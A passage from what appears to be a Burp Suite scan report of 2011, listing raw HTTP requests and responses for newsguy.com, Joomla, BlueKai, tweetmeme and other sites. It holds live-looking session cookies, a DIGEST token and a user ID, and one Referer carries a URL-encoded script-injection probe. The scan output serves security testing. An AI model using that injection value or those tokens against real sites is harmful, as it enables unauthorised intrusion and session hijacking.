Path:   /groups.htm

Request

GET /groups.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0e6392c5076efee38380c3142855f369; path=/
Content-Length: 15879
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - NewsguyGroups... - Overview</title>
<meta NAME="descri
...[SNIP]...

30.81. http://newsguy.com/ispcon.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /ispcon.htm

Request

GET /ispcon.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:45 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=09f460e512ac271d0a5c0f9309dbe44c; path=/
Content-Length: 3910
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - ISPCON Show</title>
<meta name="description" content="Copyright notice for Newsguy News Service, a provider of Commerc
...[SNIP]...

30.82. http://newsguy.com/members.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /members.htm

Request

GET /members.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:53 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=00da9a944623b64631e869c738c369e5; path=/
Content-Length: 44100
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Member Services and Features</title>
<meta NAME="descr
...[SNIP]...

30.83. http://newsguy.com/msgpanel/message.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /msgpanel/message.asp

Request

GET /msgpanel/message.asp HTTP/1.1
Host: newsguy.com
Proxy-Connection: keep-alive
Referer: http://newsguy.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:53:35 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Content-Length: 45101
Cache-Control: private
Content-Type: text/html

<head>
<style type="text/css">
<!--
body {
   font-size:10px;
   scrollbar-face-color:#26589E;
}
td {
   font-size:10px;
   scrollbar-face-color:#26589E;
}
font {
   font-size:10px;
}
//-->
</styl
...[SNIP]...

30.84. http://newsguy.com/news.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /news.asp

Request

GET /news.asp HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:05 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0e83dea317d99a7de52fe1750cde8b8b; path=/
Content-Length: 46840
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Accessing Newsgroups With Direct Read News</title>
<me
...[SNIP]...

30.85. http://newsguy.com/news.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /news.htm

Request

GET /news.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:05 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=07d8619e23c66c94db17f947a018eeac; path=/
Content-Length: 46840
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Accessing Newsgroups With Direct Read News</title>
<me
...[SNIP]...

30.86. http://newsguy.com/newsguys.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /newsguys.htm

Request

GET /newsguys.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:02 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0540c815ac03e969256e365468d2bfb0; path=/
Content-Length: 23875
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Newsguy Referral Program</title>
<meta NAME="descripti
...[SNIP]...

30.87. http://newsguy.com/overview.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /overview.htm

Request

GET /overview.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=07c1fd007b57ee5d13cb4f4071a9b2eb; path=/
Content-Length: 33263
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Newsguy's Account Options</title>
<meta NAME="descript
...[SNIP]...

30.88. http://newsguy.com/policy.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /policy.htm

Request

GET /policy.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:18 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=05a35e6e7093ee3ebb9435e70a8c4d46; path=/
Content-Length: 56165
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Service Policy</title>
<meta NAME="description" CONTEN
...[SNIP]...

30.89. http://newsguy.com/services.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /services.htm

Request

GET /services.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=054baa14c183ba1850baba7e413a8d17; path=/
Content-Length: 10374
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Services</title>
<meta NAME="description" CONTENT="Acc
...[SNIP]...

30.90. http://newsguy.com/user_info.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /user_info.asp

Request

GET /user_info.asp?0.2662578278686851 HTTP/1.1
Host: newsguy.com
Proxy-Connection: keep-alive
Referer: http://newsguy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:53:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Content-Length: 139
Expires: Mon, 24 Jan 2011 14:53:42 GMT
Cache-Control: no-cache
Content-Type: text/html


DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256
USERID=h02332
DNDDATA=200+6100000+0+0+2011012423+20110223+200+6100000+0+3050000
MAILDATA=

30.91. http://noisybox.net/computers/nzbperl/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://noisybox.net
Path:   /computers/nzbperl/

Request

GET /computers/nzbperl/ HTTP/1.1
Host: noisybox.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:53 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 35630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <link rel="icon" href="/images/favicon.ico" type="image/x-icon"/>
   <link re
...[SNIP]...

30.92. http://people.joomla.org/modules/mod_pixsearch_ng/media/js/gpixsearch/EC114CAD1010D1980F044A461CE47B22.cache.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://people.joomla.org
Path:   /modules/mod_pixsearch_ng/media/js/gpixsearch/EC114CAD1010D1980F044A461CE47B22.cache.html

Request

GET /modules/mod_pixsearch_ng/media/js/gpixsearch/EC114CAD1010D1980F044A461CE47B22.cache.html HTTP/1.1
Host: people.joomla.org
Proxy-Connection: keep-alive
Referer: http://people.joomla.org/groups/viewdiscussion/996-Joomla%C3%82%C2%AE%2016%20Has%20Arrived.html?groupid=7141e57e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee630941430d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11952431.1295967274.1.1.utmcsr=joomlacode.org|utmccn=(referral)|utmcmd=referral|utmcct=/gf/project/joomla/reporting/; 33e27d3d0725f34a77c307be63476b5b=e0d536d51f63412f1cb4302ffe89e94c; currentURI=http%3A%2F%2Fpeople.joomla.org%2Fgroups%2Fviewdiscussion%2F996-Joomla%C2%AE+16+Has+Arrived.html%3Fgroupid%3D7141e57e%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Be630941430d; __utma=11952431.110894349.1295967274.1295967274.1295967274.1; __utmc=11952431; __utmb=11952431.3.10.1295967274; __utmz=173056674.1295968217.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/68; __utma=173056674.779126497.1295968217.1295968217.1295968217.1; __utmc=173056674; __utmb=173056674.1.10.1295968217

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 15:10:20 GMT
Server: Apache
Last-Modified: Fri, 30 Jul 2010 23:04:40 GMT
ETag: "1980508-11a5d-48ca2e025b200"
Accept-Ranges: bytes
Content-Length: 72285
Content-Type: text/html

<html><head><meta charset="UTF-8" /><script>var $gwt_version = "2.0.4";var $wnd = parent;var $doc = $wnd.document;var $moduleName, $moduleBase;var $strongName = 'EC114CAD1010D1980F044A461CE47B22';var
...[SNIP]...

30.93. http://pessoal.org/papercut/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pessoal.org
Path:   /papercut/

Request

GET /papercut/ HTTP/1.1
Host: pessoal.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:03 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 11535

<html>
<head>
<title>papercut.org - nntp server for the masses</title>
<link href="/style.css" rel="stylesheet" type="text/css" media="screen">
</head>

<body bgcolor="#fff8d8">

<table border="0" wid
...[SNIP]...

30.94. http://picmonger.sourceforge.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picmonger.sourceforge.net
Path:   /

Request

GET / HTTP/1.1
Host: picmonger.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 16:02:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.11
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 16:02:06 GMT
Content-Length: 2513

<HTML>
<HEAD>
<TITLE>SourceForge: Welcome</TITLE>
<LINK rel="stylesheet" href="http://sourceforge.net/sourceforge.css" type="text/css">
</HEAD>

<BODY bgcolor=#FFFFFF topmargin="0" bottommargin="0" le
...[SNIP]...

30.95. http://r.nexac.com/e/getdata.xgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.nexac.com
Path:   /e/getdata.xgi

Request

GET /e/getdata.xgi HTTP/1.1
Host: r.nexac.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: na_tc=Y;

Response

HTTP/1.1 200 OK
Connection: close
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 24 Jan 2011 22:48:52 GMT
Server: lighttpd/1.4.18
Content-Length: 30

na_id=&na_mp=&na_mg=BR&na_da=

30.96. http://seattletimes.nwsource.com/html/businesstechnology/2014020427_amazon24.html/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seattletimes.nwsource.com
Path:   /html/businesstechnology/2014020427_amazon24.html/x22

Request

GET /html/businesstechnology/2014020427_amazon24.html/x22 HTTP/1.1
Host: seattletimes.nwsource.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Unix) DAV/2
Last-Modified: Sat, 29 Dec 2007 17:36:52 GMT
Content-Type: text/html
Date: Mon, 24 Jan 2011 16:02:24 GMT
Content-Length: 1546
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
           "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<meta name="t_omni_site" content="st" />
<meta name="t_omni_pagetype" conten
...[SNIP]...

30.97. http://sites.inka.de/~bigred/sw/c-nocem.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sites.inka.de
Path:   /~bigred/sw/c-nocem.html

Request

GET /~bigred/sw/c-nocem.html HTTP/1.1
Host: sites.inka.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:02:30 GMT
Server: Apache/1.3.9 (Unix) Debian/GNU
Connection: close
Content-Type: text/html
Content-Length: 14464

<HTML>
<HEAD>
<TITLE>c-nocem - NoCeM for C News and INN</TITLE>
<LINK REV="made" HREF="mailto:olaf@bigred.inka.de">
<!-- $Id: c-nocem.html,v 1.11 2001/05/22 12:50:32 olaf Exp $ -->
</HEAD>

<BODY>

<h
...[SNIP]...

30.98. http://tags.bluekai.com/site/10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/10

Request

GET /site/10?ret=html&phint=pageName%3Dunknown&phint=pageRequestID%3D427D360F-AD19-8945-2CEDA65620083A33&phint=affiliateGroupName%3DSearch%20Engine%20Optimization%20Project&phint=affiliateName%3DSEO%20DTS%20-%20Google%20ABTL%2013148&phint=campaign%3D13148&phint=__bk_t%3DBuy%20your%20next%20new%20or%20used%20car%20online%20with%20our%20New%20Car%20Pricing%20Guides%2C%20Car%20Reviews%2C%20Vehicle%20Comparisons%20and%20Used%20Car%20Inventory%20services.%20%7C%20Autobytel.com&phint=__bk_k%3DPricing%2CGuide%2Cbuy%20a%20new%20car%2Cbuy%20a%20used%20auto%2Cnew%20auto%2Cused%20auto%2Cnew%20car%2Cused%20car%2Cnew%20car%20pricing%2Cused%20car%20pricing%2Cdealer%2Clocal%20dealer%2C%20new%20car%20inventory%2C%20used%20car%20inventory&limit=10&r=42794077 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.autobytel.com/x22
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bku=yQG99YBZ/AlFQiDm; bko=KJ0fyXF9XJlJlJKHRH/q9T1wLfAFvT1AcyBe3gTVD9y9Uh9aYy==; bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCx8Vs/gFfw0GIU4J1ufsW6ue6EytNEOGRGe0XtExLxebEKLRWOEvz61pOXhbJFah1e9pBe3EDeyT3qbfCTgWet1w9011QZ1evAbZ+ONx49NDLpQPD9xj9OLh19DDoQSQ==; bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxgyXR9wBpxh1n/6LnutBe/6+e9pBMRtwNJFf9QY26izl; bk=dOTA6tBCxZ/sHNJo; bkc=KJhnRtPQrOgmyceoM3DF/y1exh3xnXsn0G2Cx4O8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImc1DeTdkeISiT/dfKyoiXpxT1+isd5iLg4FO7OgTKb+T9jGCdWM64MdTC9XYmj/Kol18Ae2EmOIzt03wyah3MXCVMXvePsmwXeNn6wZueZQdQOlvCX83IGdO8tHMi47hridpRulXLRk4dLs0o4VJGHpA2ACmMd+XF9ky7v72KBTewyxrHE2qU9bAaXh68DdkDPHCEIUMPDF3xbv+dS9jUFQzSUEDeyK2QC27XahCK1qhIc0759TXFV/FicGmsg7vRW82+hGdJ8eicT7WYIRy13wbDjkq2FmG/w9BZIKeT=

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 21:06:44 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=Sbr2orXnuT6sHNJo; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpMRZOQ0s5CRcM06+SUWzMZ9rJ1BcT1skIx9zawRtPQrOgmyceoMiVznXsn0Q4oCda8KHQRdQAy1C0oBT4pFfmCXAc3R4yxeQRsgPysC+ybOaXeMx2ueImcx5lgeIVF8Gny4y+gIM/pBBiYIBS+3wpBZhcXK3CfY8QCIAcXKeEIMyQWw8/jG7TlApkxwhmRl00n0k2QM1o4i1SwDZmWXp29l4rxYV/IiOd9Mzo7dGgvfta7Cww8rucbq0whFRhHIzIIG4vaoH7CdWHsiw8dryhXZSeXK56/wQ1FHe8PUyrLcLHlfWEkUNPCHmcFPDwkub3MX365DwAKScpjO9udChNidN5Q41cT27sG49z6FZy+Q7X/sgfvSDoyFC6lvod7W/nwYKxfB3e0D8oHI4rZ/dQ95omeay==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJ0qh1q9XmukguXqQpzFC1U//1zcR26Oi7N71QK0J/ai34oSxOR9PgTnh9==; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMREMWhzYQyZOARjaGRVjioZrjRZiQS8JA73uqjJ0uooruSsaiqshLqZZjj3bzorEny79O3Jb5GExFm0Idw1IctHyG29WGJ1hQRZOiRZHZRVOARZoCSskrjZhAXj9JJ1lwpx9W+XaLUtTAlqFOxitRxArHCjbX+9DvX4v9fE9l1pYhBnv6+ex0BnRy1exlBM8uqITn9YsAnPA=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw4=KJpfoXU9y1M90zU9LsXb9T1wLfZFggw1b65ZDFRyIQQM9y1f9f1C9XmeKTPo2fuHNK2Zy3bKkVWmDctEkRFSakNiNn1hUeBiRBMXGAMpaac3tH7I9+V4YpCxhSbwgwfJuNrLbgAjcW6RsvELmqx2eBcBdfw0T0U4o9Hfs9NupXHyt8uO/zgeittavDQ2DeZe/9wW4e4PD3jjcB7tNF42Kb47a5Zc1RaDVaA01OpXWzioSxcueEn4LRWOEvz61pOXhtnwn39IjGjuSySsaE4Uz4aRQDhCTsPQAWNQjWMPNTv3eTYgkyqq9yJOOLhm3tpHl4VgnZ+w0Kx1Khi2Q97AAi5te9yhFpkp9qpZCTX=; expires=Sat, 23-Jul-2011 21:06:44 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 25-Jan-2011 21:06:44 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 430
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://cm.g.doubleclick.net/pixel?nid=bluekai&" width=1 height=1 border=0 alt="">
<img src="http://osmdcs.interclick.com/pixel.aspx?dp=9EB
...[SNIP]...

30.99. http://tweetmeme.com/channels

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /channels

Request

GET /channels HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.0 502 Invalid response
Cache-Control: no-cache
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tw
...[SNIP]...

30.100. http://tweetmeme.com/media/image

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /media/image

Request

GET /media/image HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.0 502 Invalid response
Cache-Control: no-cache
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tw
...[SNIP]...

30.101. http://tweetmeme.com/media/video

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /media/video

Request

